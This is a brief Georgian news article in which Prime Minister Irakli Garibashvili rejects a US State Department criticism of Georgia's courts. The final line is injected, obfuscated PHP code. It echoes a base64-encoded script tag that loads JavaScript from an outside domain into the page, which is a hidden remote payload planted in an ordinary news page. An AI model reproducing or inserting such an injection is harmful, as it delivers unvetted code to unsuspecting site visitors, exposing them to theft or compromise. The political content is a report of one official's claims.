celsiusi
ავერსი საქკაბელი
ჩვენი სასამართლო არის ერთ-ერთი გამორჩეული მთელ რეგიონში, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა განაცხადა.
 
პრემიერმა კომენტარი გააკეთა აშშ-ის სახელმწიფო დეპარტამენტის ანგარიშის იმ ნაწილზე, სადაც ნათქვამია: „მზარდი უნდობლობაა სასამართლო სექტორის შესაძლებლობის მიმართ, რომ კომერციულ დავებს განიხილავს დამოუკიდებლად ან დროული, კომპეტენტური გზით, რამდენადაც ბიზნესის დავების ნაწილი სასამართლო სისტემაში წლობით ჭიანურდება“.
 
ირაკლი ღარიბაშვილის თქმით, ის ბევრ ევროკავშირის წევრ ქვეყანას უსწრებს თავისი მიღწევებით, ანგარიშვალდებულებით, გამჭვირვალობით.
 
„ჩვენი სასამართლო არის ერთ-ერთი, რომ იტყვიან, გამორჩეული მთელ რეგიონში. ის კი არა, ბევრ ევროკავშირის წევრ ქვეყანას უსწრებს თავისი მიღწევებით, ანგარიშვალდებულებით, გამჭვირვალობით“, – განაცხადა ირაკლი ღარიბაშვილმა.
505
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");